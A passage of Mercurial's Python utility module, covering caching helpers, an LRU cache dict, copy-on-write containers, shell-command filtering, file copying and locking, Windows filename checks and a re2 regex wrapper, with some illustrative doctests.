    (3, 9, None, 'rc+2-02a8fea4289b')
    """
    if not v:
        v = version()
    parts = remod.split(r'[\+-]', v, 1)
    if len(parts) == 1:
        vparts, extra = parts[0], None
    else:
        vparts, extra = parts

    vints = []
    for i in vparts.split('.'):
        try:
            vints.append(int(i))
        except ValueError:
            break
    # (3, 6) -> (3, 6, None)
    while len(vints) < 3:
        vints.append(None)

    if n == 2:
        return (vints[0], vints[1])
    if n == 3:
        return (vints[0], vints[1], vints[2])
    if n == 4:
        return (vints[0], vints[1], vints[2], extra)

def cachefunc(func):
    '''cache the result of function calls'''
    # XXX doesn't handle keyword args
    if func.__code__.co_argcount == 0:
        cache = []
        def f():
            if len(cache) == 0:
                cache.append(func())
            return cache[0]
        return f
    cache = {}
    if func.__code__.co_argcount == 1:
        # we gain a small amount of time because
        # we don't need to pack/unpack the list
        def f(arg):
            if arg not in cache:
                cache[arg] = func(arg)
            return cache[arg]
    else:
        def f(*args):
            if args not in cache:
                cache[args] = func(*args)
            return cache[args]

    return f

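# A small illustrative doctest for cachefunc: the wrapped function is
# evaluated once per distinct positional argument.
def _cachefuncexample():
    """
    >>> calls = []
    >>> def square(x):
    ...     calls.append(x)
    ...     return x * x
    >>> square = cachefunc(square)
    >>> square(3), square(3), square(4)
    (9, 9, 16)
    >>> calls
    [3, 4]
    """
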
class cow(object):
    """helper class to make copy-on-write easier

    Call preparewrite before doing any writes.
    """

    def preparewrite(self):
        """call this before writes, return self or a copied new object"""
        if getattr(self, '_copied', 0):
            self._copied -= 1
            return self.__class__(self)
        return self

    def copy(self):
        """always do a cheap copy"""
        self._copied = getattr(self, '_copied', 0) + 1
        return self

class sortdict(collections.OrderedDict):
    '''a simple sorted dictionary

    >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
    >>> d2 = d1.copy()
    >>> d2
    sortdict([('a', 0), ('b', 1)])
    >>> d2.update([(b'a', 2)])
    >>> list(d2.keys()) # should still be in last-set order
    ['b', 'a']
    '''

    def __setitem__(self, key, value):
        if key in self:
            del self[key]
        super(sortdict, self).__setitem__(key, value)

    if pycompat.ispypy:
        # __setitem__() isn't called as of PyPy 5.8.0
        def update(self, src):
            if isinstance(src, dict):
                src = src.iteritems()
            for k, v in src:
                self[k] = v

class cowdict(cow, dict):
    """copy-on-write dict

    Be sure to call d = d.preparewrite() before writing to d.

    >>> a = cowdict()
    >>> a is a.preparewrite()
    True
    >>> b = a.copy()
    >>> b is a
    True
    >>> c = b.copy()
    >>> c is a
    True
    >>> a = a.preparewrite()
    >>> b is a
    False
    >>> a is a.preparewrite()
    True
    >>> c = c.preparewrite()
    >>> b is c
    False
    >>> b is b.preparewrite()
    True
    """

class cowsortdict(cow, sortdict):
    """copy-on-write sortdict

    Be sure to call d = d.preparewrite() before writing to d.
    """

class transactional(object):
    """Base class for making a transactional type into a context manager."""
    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def close(self):
        """Successfully closes the transaction."""

    @abc.abstractmethod
    def release(self):
        """Marks the end of the transaction.

        If the transaction has not been closed, it will be aborted.
        """

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        try:
            if exc_type is None:
                self.close()
        finally:
            self.release()

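# An illustrative minimal subclass showing the context-manager contract:
# close() runs only on a clean exit, while release() always runs.
class _demotransaction(transactional):
    """
    >>> tr = _demotransaction()
    >>> with tr:
    ...     pass
    >>> tr.closed, tr.released
    (True, True)

    >>> tr = _demotransaction()
    >>> try:
    ...     with tr:
    ...         raise KeyboardInterrupt
    ... except KeyboardInterrupt:
    ...     pass
    >>> tr.closed, tr.released
    (False, True)
    """
    def __init__(self):
        self.closed = False
        self.released = False

    def close(self):
        self.closed = True

    def release(self):
        self.released = True
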
@contextlib.contextmanager
def acceptintervention(tr=None):
    """A context manager that closes the transaction on InterventionRequired

    If no transaction was provided, this simply runs the body and returns.
    """
    if not tr:
        yield
        return
    try:
        yield
        tr.close()
    except error.InterventionRequired:
        tr.close()
        raise
    finally:
        tr.release()

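# A typical call shape, sketched with hypothetical repo/transaction names:
#
#   tr = repo.transaction(b'somework')
#   with acceptintervention(tr):
#       ...  # may raise error.InterventionRequired
#
# On InterventionRequired the transaction is closed (its work is kept) and
# the exception still propagates; any other exception skips close(), so
# release() aborts the transaction.
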
@contextlib.contextmanager
def nullcontextmanager():
    yield

class _lrucachenode(object):
    """A node in a doubly linked list.

    Holds a reference to nodes on either side as well as a key-value
    pair for the dictionary entry.
    """
    __slots__ = (u'next', u'prev', u'key', u'value')

    def __init__(self):
        self.next = None
        self.prev = None

        self.key = _notset
        self.value = None

    def markempty(self):
        """Mark the node as emptied."""
        self.key = _notset

class lrucachedict(object):
    """Dict that caches most recent accesses and sets.

    The dict consists of an actual backing dict - indexed by original
    key - and a doubly linked circular list defining the order of entries in
    the cache.

    The head node is the newest entry in the cache. If the cache is full,
    we recycle head.prev and make it the new head. Cache accesses result in
    the node being moved to before the existing head and being marked as the
    new head node.
    """
    def __init__(self, max):
        self._cache = {}

        self._head = head = _lrucachenode()
        head.prev = head
        head.next = head
        self._size = 1
        self._capacity = max

    def __len__(self):
        return len(self._cache)

    def __contains__(self, k):
        return k in self._cache

    def __iter__(self):
        # We don't have to iterate in cache order, but why not.
        n = self._head
        for i in range(len(self._cache)):
            yield n.key
            n = n.next

    def __getitem__(self, k):
        node = self._cache[k]
        self._movetohead(node)
        return node.value

    def __setitem__(self, k, v):
        node = self._cache.get(k)
        # Replace existing value and mark as newest.
        if node is not None:
            node.value = v
            self._movetohead(node)
            return

        if self._size < self._capacity:
            node = self._addcapacity()
        else:
            # Grab the last/oldest item.
            node = self._head.prev

            # At capacity. Kill the old entry.
            if node.key is not _notset:
                del self._cache[node.key]

        node.key = k
        node.value = v
        self._cache[k] = node
        # And mark it as newest entry. No need to adjust order since it
        # is already self._head.prev.
        self._head = node

    def __delitem__(self, k):
        node = self._cache.pop(k)
        node.markempty()

        # Temporarily mark as newest item before re-adjusting head to make
        # this node the oldest item.
        self._movetohead(node)
        self._head = node.next

    # Additional dict methods.

    def get(self, k, default=None):
        try:
            return self._cache[k].value
        except KeyError:
            return default

    def clear(self):
        n = self._head
        while n.key is not _notset:
            n.markempty()
            n = n.next

        self._cache.clear()

    def copy(self):
        result = lrucachedict(self._capacity)
        n = self._head.prev
        # Iterate in oldest-to-newest order, so the copy has the right ordering
        for i in range(len(self._cache)):
            result[n.key] = n.value
            n = n.prev
        return result

    def _movetohead(self, node):
        """Mark a node as the newest, making it the new head.

        When a node is accessed, it becomes the freshest entry in the LRU
        list, which is denoted by self._head.

        Visually, let's make ``N`` the new head node (* denotes head):

            previous/oldest <-> head <-> next/next newest

            ----<->--- A* ---<->-----
            |                       |
            E <-> D <-> N <-> C <-> B

        To:

            ----<->--- N* ---<->-----
            |                       |
            E <-> D <-> C <-> B <-> A

        This requires the following moves:

           C.next = D  (node.prev.next = node.next)
           D.prev = C  (node.next.prev = node.prev)
           E.next = N  (head.prev.next = node)
           N.prev = E  (node.prev = head.prev)
           N.next = A  (node.next = head)
           A.prev = N  (head.prev = node)
        """
        head = self._head
        # C.next = D
        node.prev.next = node.next
        # D.prev = C
        node.next.prev = node.prev
        # N.prev = E
        node.prev = head.prev
        # N.next = A
        # It is tempting to do just "head" here, however if node is
        # adjacent to head, this will do bad things.
        node.next = head.prev.next
        # E.next = N
        node.next.prev = node
        # A.prev = N
        node.prev.next = node

        self._head = node

    def _addcapacity(self):
        """Add a node to the circular linked list.

        The new node is inserted before the head node.
        """
        head = self._head
        node = _lrucachenode()
        head.prev.next = node
        node.prev = head.prev
        node.next = head
        head.prev = node
        self._size += 1
        return node

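# An illustrative doctest: with a capacity of 2, inserting a third key
# evicts the least recently used entry.
def _lrucachedictexample():
    """
    >>> d = lrucachedict(2)
    >>> d[b'a'] = 1
    >>> d[b'b'] = 2
    >>> d[b'a']            # touch b'a' so b'b' becomes the oldest entry
    1
    >>> d[b'c'] = 3        # at capacity: b'b' is recycled
    >>> b'b' in d, b'a' in d
    (False, True)
    """
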
def lrucachefunc(func):
    '''cache most recent results of function calls'''
    cache = {}
    order = collections.deque()
    if func.__code__.co_argcount == 1:
        def f(arg):
            if arg not in cache:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[arg] = func(arg)
            else:
                order.remove(arg)
            order.append(arg)
            return cache[arg]
    else:
        def f(*args):
            if args not in cache:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[args] = func(*args)
            else:
                order.remove(args)
            order.append(args)
            return cache[args]

    return f

class propertycache(object):
    def __init__(self, func):
        self.func = func
        self.name = func.__name__
    def __get__(self, obj, type=None):
        result = self.func(obj)
        self.cachevalue(obj, result)
        return result

    def cachevalue(self, obj, value):
        # __dict__ assignment required to bypass __setattr__ (eg: repoview)
        obj.__dict__[self.name] = value

def clearcachedproperty(obj, prop):
    '''clear a cached property value, if one has been set'''
    if prop in obj.__dict__:
        del obj.__dict__[prop]

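# An illustrative doctest: propertycache is a non-data descriptor, so the
# first access computes and stores the value in the instance __dict__,
# which then shadows the descriptor until cleared.
def _propertycacheexample():
    """
    >>> class numbers(object):
    ...     @propertycache
    ...     def answer(self):
    ...         print('computing')
    ...         return 42
    >>> n = numbers()
    >>> n.answer
    computing
    42
    >>> n.answer
    42
    >>> clearcachedproperty(n, 'answer')
    >>> n.answer
    computing
    42
    """
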
def pipefilter(s, cmd):
    '''filter string S through command CMD, returning its output'''
    p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                         stdin=subprocess.PIPE, stdout=subprocess.PIPE)
    pout, perr = p.communicate(s)
    return pout

def tempfilter(s, cmd):
    '''filter string S through a pair of temporary files with CMD.
    CMD is used as a template to create the real command to be run,
    with the strings INFILE and OUTFILE replaced by the real names of
    the temporary files generated.'''
    inname, outname = None, None
    try:
        infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
        fp = os.fdopen(infd, r'wb')
        fp.write(s)
        fp.close()
        outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
        os.close(outfd)
        cmd = cmd.replace('INFILE', inname)
        cmd = cmd.replace('OUTFILE', outname)
        code = os.system(cmd)
        if pycompat.sysplatform == 'OpenVMS' and code & 1:
            code = 0
        if code:
            raise error.Abort(_("command '%s' failed: %s") %
                              (cmd, explainexit(code)))
        return readfile(outname)
    finally:
        try:
            if inname:
                os.unlink(inname)
        except OSError:
            pass
        try:
            if outname:
                os.unlink(outname)
        except OSError:
            pass

filtertable = {
    'tempfile:': tempfilter,
    'pipe:': pipefilter,
}

def filter(s, cmd):
    "filter a string through a command that transforms its input to its output"
    for name, fn in filtertable.iteritems():
        if cmd.startswith(name):
            return fn(s, cmd[len(name):].lstrip())
    return pipefilter(s, cmd)

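# A usage sketch: the command prefix picks the filtering strategy (the
# shell commands shown here are hypothetical):
#
#   filter(s, 'pipe: tr a-z A-Z')                # stdin/stdout pipe
#   filter(s, 'tempfile: sort INFILE > OUTFILE') # via temporary files
#   filter(s, 'tr a-z A-Z')                      # no prefix: pipefilter
#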
def increasingchunks(source, min=1024, max=65536):
    '''return no less than min bytes per chunk while data remains,
    doubling min after each chunk until it reaches max'''
    def log2(x):
        if not x:
            return 0
        i = 0
        while x:
            x >>= 1
            i += 1
        return i - 1

    buf = []
    blen = 0
    for chunk in source:
        buf.append(chunk)
        blen += len(chunk)
        if blen >= min:
            if min < max:
                min = min << 1
                nmin = 1 << log2(blen)
                if nmin > min:
                    min = nmin
                if min > max:
                    min = max
            yield ''.join(buf)
            blen = 0
            buf = []
    if buf:
        yield ''.join(buf)

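# An illustrative doctest: twenty 100-byte chunks are regrouped, with the
# chunk size doubling from min until it reaches max, plus a final partial
# chunk.
def _increasingchunksexample():
    """
    >>> [len(c) for c in increasingchunks([b'a' * 100] * 20,
    ...                                   min=200, max=800)]
    [200, 400, 800, 600]
    """
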
Abort = error.Abort

def always(fn):
    return True

def never(fn):
    return False

def nogc(func):
    """disable garbage collector

    Python's garbage collector triggers a GC each time a certain number of
    container objects (the number being defined by gc.get_threshold()) are
    allocated even when marked not to be tracked by the collector. Tracking has
    no effect on when GCs are triggered, only on what objects the GC looks
    into. As a workaround, disable GC while building complex (huge)
    containers.

    This garbage collector issue has been fixed in 2.7, but it still affects
    CPython's performance.
    """
    def wrapper(*args, **kwargs):
        gcenabled = gc.isenabled()
        gc.disable()
        try:
            return func(*args, **kwargs)
        finally:
            if gcenabled:
                gc.enable()
    return wrapper

if pycompat.ispypy:
    # PyPy runs slower with gc disabled
    nogc = lambda x: x

def pathto(root, n1, n2):
    '''return the relative path from one place to another.
    root should use os.sep to separate directories
    n1 should use os.sep to separate directories
    n2 should use "/" to separate directories
    returns an os.sep-separated path.

    If n1 is a relative path, it is assumed to be relative to root.
    n2 should always be relative to root.
    '''
    if not n1:
        return localpath(n2)
    if os.path.isabs(n1):
        if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
            return os.path.join(root, localpath(n2))
        n2 = '/'.join((pconvert(root), n2))
    a, b = splitpath(n1), n2.split('/')
    a.reverse()
    b.reverse()
    while a and b and a[-1] == b[-1]:
        a.pop()
        b.pop()
    b.reverse()
    return pycompat.ossep.join((['..'] * len(a)) + b) or '.'

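# A usage sketch (POSIX paths, so os.sep is '/'): from directory a/b to a
# file under a/c, both relative to the root:
#
#   pathto(b'/repo', b'a/b', b'a/c/file.txt')  # -> b'../c/file.txt'
#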
def mainfrozen():
    """return True if we are a frozen executable.

    The code supports py2exe (most common, Windows only) and tools/freeze
    (portable, not much used).
    """
    return (safehasattr(sys, "frozen") or # new py2exe
            safehasattr(sys, "importers") or # old py2exe
            imp.is_frozen(u"__main__")) # tools/freeze

# the location of data files matching the source code
if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
    # executable version (py2exe) doesn't support __file__
    datapath = os.path.dirname(pycompat.sysexecutable)
else:
    datapath = os.path.dirname(pycompat.fsencode(__file__))

i18n.setdatapath(datapath)

_hgexecutable = None

def hgexecutable():
    """return location of the 'hg' executable.

    Defaults to $HG or 'hg' in the search path.
    """
    if _hgexecutable is None:
        hg = encoding.environ.get('HG')
        mainmod = sys.modules[r'__main__']
        if hg:
            _sethgexecutable(hg)
        elif mainfrozen():
            if getattr(sys, 'frozen', None) == 'macosx_app':
                # Env variable set by py2app
                _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
            else:
                _sethgexecutable(pycompat.sysexecutable)
        elif (os.path.basename(
            pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
            _sethgexecutable(pycompat.fsencode(mainmod.__file__))
        else:
            exe = findexe('hg') or os.path.basename(sys.argv[0])
            _sethgexecutable(exe)
    return _hgexecutable

def _sethgexecutable(path):
    """set location of the 'hg' executable"""
    global _hgexecutable
    _hgexecutable = path

def _testfileno(f, stdf):
    fileno = getattr(f, 'fileno', None)
    try:
        return fileno and fileno() == stdf.fileno()
    except io.UnsupportedOperation:
        return False # fileno() raised UnsupportedOperation

def isstdin(f):
    return _testfileno(f, sys.__stdin__)

def isstdout(f):
    return _testfileno(f, sys.__stdout__)

def shellenviron(environ=None):
    """return environ with optional override, useful for shelling out"""
    def py2shell(val):
        'convert python object into string that is useful to shell'
        if val is None or val is False:
            return '0'
        if val is True:
            return '1'
        return pycompat.bytestr(val)
    env = dict(encoding.environ)
    if environ:
        env.update((k, py2shell(v)) for k, v in environ.iteritems())
    env['HG'] = hgexecutable()
    return env

def system(cmd, environ=None, cwd=None, out=None):
    '''enhanced shell command execution.
    run with environment maybe modified, maybe in different dir.

    if out is specified, it is assumed to be a file-like object that has a
    write() method. stdout and stderr will be redirected to out.'''
    try:
        stdout.flush()
    except Exception:
        pass
    cmd = quotecommand(cmd)
    env = shellenviron(environ)
    if out is None or isstdout(out):
        rc = subprocess.call(cmd, shell=True, close_fds=closefds,
                             env=env, cwd=cwd)
    else:
        proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                                env=env, cwd=cwd, stdout=subprocess.PIPE,
                                stderr=subprocess.STDOUT)
        for line in iter(proc.stdout.readline, ''):
            out.write(line)
        proc.wait()
        rc = proc.returncode
    if pycompat.sysplatform == 'OpenVMS' and rc & 1:
        rc = 0
    return rc

def checksignature(func):
    '''wrap a function with code to check for calling errors'''
    def check(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except TypeError:
            if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
                raise error.SignatureError
            raise

    return check

# a whitelist of known filesystems where hardlinks work reliably
_hardlinkfswhitelist = {
    'btrfs',
    'ext2',
    'ext3',
    'ext4',
    'hfs',
    'jfs',
    'NTFS',
    'reiserfs',
    'tmpfs',
    'ufs',
    'xfs',
    'zfs',
}

def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
    '''copy a file, preserving mode and optionally other stat info like
    atime/mtime

    checkambig argument is used with filestat, and is useful only if
    destination file is guarded by any lock (e.g. repo.lock or
    repo.wlock).

    copystat and checkambig should be exclusive.
    '''
    assert not (copystat and checkambig)
    oldstat = None
    if os.path.lexists(dest):
        if checkambig:
            oldstat = checkambig and filestat.frompath(dest)
        unlink(dest)
    if hardlink:
        # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
        # unless we are confident that dest is on a whitelisted filesystem.
        try:
            fstype = getfstype(os.path.dirname(dest))
        except OSError:
            fstype = None
        if fstype not in _hardlinkfswhitelist:
            hardlink = False
    if hardlink:
        try:
            oslink(src, dest)
            return
        except (IOError, OSError):
            pass # fall back to normal copy
    if os.path.islink(src):
        os.symlink(os.readlink(src), dest)
        # copytime is ignored for symlinks, but in general copytime isn't
        # needed for them anyway
    else:
        try:
            shutil.copyfile(src, dest)
            if copystat:
                # copystat also copies mode
                shutil.copystat(src, dest)
            else:
                shutil.copymode(src, dest)
                if oldstat and oldstat.stat:
                    newstat = filestat.frompath(dest)
                    if newstat.isambig(oldstat):
                        # stat of copied file is ambiguous to original one
                        advanced = (
                            oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
                        os.utime(dest, (advanced, advanced))
        except shutil.Error as inst:
            raise error.Abort(str(inst))

def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
    """Copy a directory tree using hardlinks if possible."""
    num = 0

    gettopic = lambda: hardlink and _('linking') or _('copying')

    if os.path.isdir(src):
        if hardlink is None:
            hardlink = (os.stat(src).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = gettopic()
        os.mkdir(dst)
        for name, kind in listdir(src):
            srcname = os.path.join(src, name)
            dstname = os.path.join(dst, name)
            def nprog(t, pos):
                if pos is not None:
                    return progress(t, pos + num)
            hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
            num += n
    else:
        if hardlink is None:
            hardlink = (os.stat(os.path.dirname(src)).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = gettopic()

        if hardlink:
            try:
                oslink(src, dst)
            except (IOError, OSError):
                hardlink = False
                shutil.copy(src, dst)
        else:
            shutil.copy(src, dst)
        num += 1
        progress(topic, num)
    progress(topic, None)

    return hardlink, num

_winreservednames = {
    'con', 'prn', 'aux', 'nul',
    'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
    'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
}
_winreservedchars = ':*?"<>|'
def checkwinfilename(path):
    r'''Check that the base-relative path is a valid filename on Windows.
    Returns None if the path is ok, or a UI string describing the problem.

    >>> checkwinfilename(b"just/a/normal/path")
    >>> checkwinfilename(b"foo/bar/con.xml")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/con.xml/bar")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/xml.con")
    >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
    "filename contains 'AUX', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/bla:.txt")
    "filename contains ':', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/b\07la.txt")
    "filename contains '\\x07', which is invalid on Windows"
    >>> checkwinfilename(b"foo/bar/bla ")
    "filename ends with ' ', which is not allowed on Windows"
    >>> checkwinfilename(b"../bar")
    >>> checkwinfilename(b"foo\\")
    "filename ends with '\\', which is invalid on Windows"
    >>> checkwinfilename(b"foo\\/bar")
    "directory name ends with '\\', which is invalid on Windows"
    '''
    if path.endswith('\\'):
        return _("filename ends with '\\', which is invalid on Windows")
    if '\\/' in path:
        return _("directory name ends with '\\', which is invalid on Windows")
    for n in path.replace('\\', '/').split('/'):
        if not n:
            continue
        for c in _filenamebytestr(n):
            if c in _winreservedchars:
                return _("filename contains '%s', which is reserved "
                         "on Windows") % c
            if ord(c) <= 31:
                return _("filename contains '%s', which is invalid "
                         "on Windows") % stringutil.escapestr(c)
        base = n.split('.')[0]
        if base and base.lower() in _winreservednames:
            return _("filename contains '%s', which is reserved "
                     "on Windows") % base
        t = n[-1:]
        if t in '. ' and n not in '..':
            return _("filename ends with '%s', which is not allowed "
                     "on Windows") % t

if pycompat.iswindows:
    checkosfilename = checkwinfilename
    timer = time.clock
else:
    checkosfilename = platform.checkosfilename
    timer = time.time

if safehasattr(time, "perf_counter"):
    timer = time.perf_counter

def makelock(info, pathname):
    """Create a lock file atomically if possible

    This may leave a stale lock file if symlink isn't supported and signal
    interrupt is enabled.
    """
    try:
        return os.symlink(info, pathname)
    except OSError as why:
        if why.errno == errno.EEXIST:
            raise
    except AttributeError: # no symlink in os
        pass

    flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
    ld = os.open(pathname, flags)
    os.write(ld, info)
    os.close(ld)

def readlock(pathname):
    try:
        return os.readlink(pathname)
    except OSError as why:
        if why.errno not in (errno.EINVAL, errno.ENOSYS):
            raise
    except AttributeError: # no symlink in os
        pass
    fp = posixfile(pathname, 'rb')
    r = fp.read()
    fp.close()
    return r

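# A usage sketch; the lock path and payload here are hypothetical.
# readlock() recovers the payload whether makelock() used a symlink or
# fell back to writing a regular file:
#
#   makelock(b'hostname:12345', b'.hg/store/lock')
#   readlock(b'.hg/store/lock')    # -> b'hostname:12345'
#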
def fstat(fp):
    '''stat file object that may not have fileno method.'''
    try:
        return os.fstat(fp.fileno())
    except AttributeError:
        return os.stat(fp.name)

# File system features

def fscasesensitive(path):
    """
    Return true if the given path is on a case-sensitive filesystem

    Requires a path (like /foo/.hg) ending with a foldable final
    directory component.
    """
    s1 = os.lstat(path)
    d, b = os.path.split(path)
    b2 = b.upper()
    if b == b2:
        b2 = b.lower()
        if b == b2:
            return True # no evidence against case sensitivity
    p2 = os.path.join(d, b2)
    try:
        s2 = os.lstat(p2)
        if s2 == s1:
            return False
        return True
    except OSError:
        return True

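# Illustrative sketch (hypothetical _examplecasecheck helper): probing a
# repository's metadata directory with fscasesensitive(). The path must
# name an existing entry whose final component is case-foldable, per the
# docstring above.
def _examplecasecheck(repopath):
    # True on most Linux filesystems, False on a default macOS volume
    return fscasesensitive(os.path.join(repopath, '.hg'))
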
try:
    import re2
    _re2 = None
except ImportError:
    _re2 = False

class _re(object):
    def _checkre2(self):
        global _re2
        try:
            # check if match works, see issue3964
            _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
        except ImportError:
            _re2 = False

    def compile(self, pat, flags=0):
        '''Compile a regular expression, using re2 if possible

        For best performance, use only re2-compatible regexp features. The
        only flags from the re module that are re2-compatible are
        IGNORECASE and MULTILINE.'''
        if _re2 is None:
            self._checkre2()
        if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
            if flags & remod.IGNORECASE:
                pat = '(?i)' + pat
            if flags & remod.MULTILINE:
                pat = '(?m)' + pat
            try:
                return re2.compile(pat)
            except re2.error:
                pass
        return remod.compile(pat, flags)

    @propertycache
    def escape(self):
        '''Return the version of escape corresponding to self.compile.

        This is imperfect because whether re2 or re is used for a particular
        function depends on the flags, etc, but it's the best we can do.
        '''
        global _re2
        if _re2 is None:
            self._checkre2()
        if _re2:
            return re2.escape
        else:
            return remod.escape

re = _re()

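# Illustrative sketch (hypothetical _examplerecompile helper): callers use
# the module-level ``re`` instance like the stdlib module and transparently
# get re2 when it is installed and the pattern/flags are compatible.
def _examplerecompile():
    pat = re.compile(br'^[a-f0-9]{40}$', remod.IGNORECASE)
    # IGNORECASE is rewritten to an inline '(?i)' for the re2 backend
    return bool(pat.match(b'A' * 40))  # True
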
_fspathcache = {}
def fspath(name, root):
    '''Get name in the case stored in the filesystem

    The name should be relative to root, and be normcase-ed for efficiency.

    Note that this function is unnecessary, and should not be
    called, for case-sensitive filesystems (simply because it's expensive).

    The root should be normcase-ed, too.
    '''
    def _makefspathcacheentry(dir):
        return dict((normcase(n), n) for n in os.listdir(dir))

    seps = pycompat.ossep
    if pycompat.osaltsep:
        seps = seps + pycompat.osaltsep
    # Protect backslashes. This gets silly very quickly.
    seps = seps.replace('\\', '\\\\')
    pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
    dir = os.path.normpath(root)
    result = []
    for part, sep in pattern.findall(name):
        if sep:
            result.append(sep)
            continue

        if dir not in _fspathcache:
            _fspathcache[dir] = _makefspathcacheentry(dir)
        contents = _fspathcache[dir]

        found = contents.get(part)
        if not found:
            # retry "once per directory" per "dirstate.walk", which
            # may take place for each patch of "hg qpush", for example
            _fspathcache[dir] = contents = _makefspathcacheentry(dir)
            found = contents.get(part)

        result.append(found or part)
        dir = os.path.join(dir, part)

    return ''.join(result)

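# Illustrative sketch (hypothetical _examplefspath helper): recovering the
# on-disk spelling of a user-supplied path on a case-insensitive
# filesystem. Both arguments are normcase-ed first, as the docstring
# requires.
def _examplefspath(root):
    # with a file 'README.txt' under root, this returns 'README.txt'
    return fspath(normcase('readme.txt'), normcase(root))
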
def checknlink(testfile):
    '''check whether hardlink count reporting works properly'''

    # testfile may be open, so we need a separate file for checking to
    # work around issue2543 (or testfile may get lost on Samba shares)
    f1, f2, fp = None, None, None
    try:
        fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
                                  suffix='1~', dir=os.path.dirname(testfile))
        os.close(fd)
        f2 = '%s2~' % f1[:-2]

        oslink(f1, f2)
        # nlinks() may behave differently for files on Windows shares if
        # the file is open.
        fp = posixfile(f2)
        return nlinks(f2) > 1
    except OSError:
        return False
    finally:
        if fp is not None:
            fp.close()
        for f in (f1, f2):
            try:
                if f is not None:
                    os.unlink(f)
            except OSError:
                pass

def endswithsep(path):
    '''Check path ends with os.sep or os.altsep.'''
    return (path.endswith(pycompat.ossep)
            or pycompat.osaltsep and path.endswith(pycompat.osaltsep))

def splitpath(path):
    '''Split path by os.sep.
    Note that this function does not use os.altsep because this is
    an alternative to a simple "xxx.split(os.sep)".
    It is recommended to use os.path.normpath() before using this
    function if needed.'''
    return path.split(pycompat.ossep)

def gui():
    '''Are we running in a GUI?'''
    if pycompat.isdarwin:
        if 'SSH_CONNECTION' in encoding.environ:
            # handle SSH access to a box where the user is logged in
            return False
        elif getattr(osutil, 'isgui', None):
            # check if a CoreGraphics session is available
            return osutil.isgui()
        else:
            # pure build; use a safe default
            return True
    else:
        return pycompat.iswindows or encoding.environ.get("DISPLAY")

def mktempcopy(name, emptyok=False, createmode=None):
    """Create a temporary file with the same contents as name

    The permission bits are copied from the original file.

    If the temporary file is going to be truncated immediately, you
    can use emptyok=True as an optimization.

    Returns the name of the temporary file.
    """
    d, fn = os.path.split(name)
    fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
    os.close(fd)
    # Temporary files are created with mode 0600, which is usually not
    # what we want. If the original file already exists, just copy
    # its mode. Otherwise, manually obey umask.
    copymode(name, temp, createmode)
    if emptyok:
        return temp
    try:
        try:
            ifp = posixfile(name, "rb")
        except IOError as inst:
            if inst.errno == errno.ENOENT:
                return temp
            if not getattr(inst, 'filename', None):
                inst.filename = name
            raise
        ofp = posixfile(temp, "wb")
        for chunk in filechunkiter(ifp):
            ofp.write(chunk)
        ifp.close()
        ofp.close()
    except: # re-raises
        try:
            os.unlink(temp)
        except OSError:
            pass
        raise
    return temp

class filestat(object):
    """help to exactly detect change of a file

    'stat' attribute is the result of 'os.stat()' if the specified 'path'
    exists. Otherwise, it is None. This can avoid a preparative
    'exists()' examination on the client side of this class.
    """
    def __init__(self, stat):
        self.stat = stat

    @classmethod
    def frompath(cls, path):
        try:
            stat = os.stat(path)
        except OSError as err:
            if err.errno != errno.ENOENT:
                raise
            stat = None
        return cls(stat)

    @classmethod
    def fromfp(cls, fp):
        stat = os.fstat(fp.fileno())
        return cls(stat)

    __hash__ = object.__hash__

    def __eq__(self, old):
        try:
            # if ambiguity between stat of new and old file is
            # avoided, comparison of size, ctime and mtime is enough
            # to exactly detect change of a file regardless of platform
            return (self.stat.st_size == old.stat.st_size and
                    self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
                    self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
        except AttributeError:
            pass
        try:
            return self.stat is None and old.stat is None
        except AttributeError:
            return False

    def isambig(self, old):
        """Examine whether new (= self) stat is ambiguous against old one

        "S[N]" below means stat of a file at N-th change:

        - S[n-1].ctime  < S[n].ctime: can detect change of a file
        - S[n-1].ctime == S[n].ctime
          - S[n-1].ctime  < S[n].mtime: means natural advancing (*1)
          - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
          - S[n-1].ctime  > S[n].mtime: never occurs naturally (don't care)
        - S[n-1].ctime  > S[n].ctime: never occurs naturally (don't care)

        Case (*2) above means that a file was changed twice or more at
        the same time in seconds (= S[n-1].ctime), and comparison of
        timestamps is ambiguous.

        The base idea to avoid such ambiguity is "advance mtime 1 sec, if
        the timestamp is ambiguous".

        But advancing mtime only in case (*2) doesn't work as
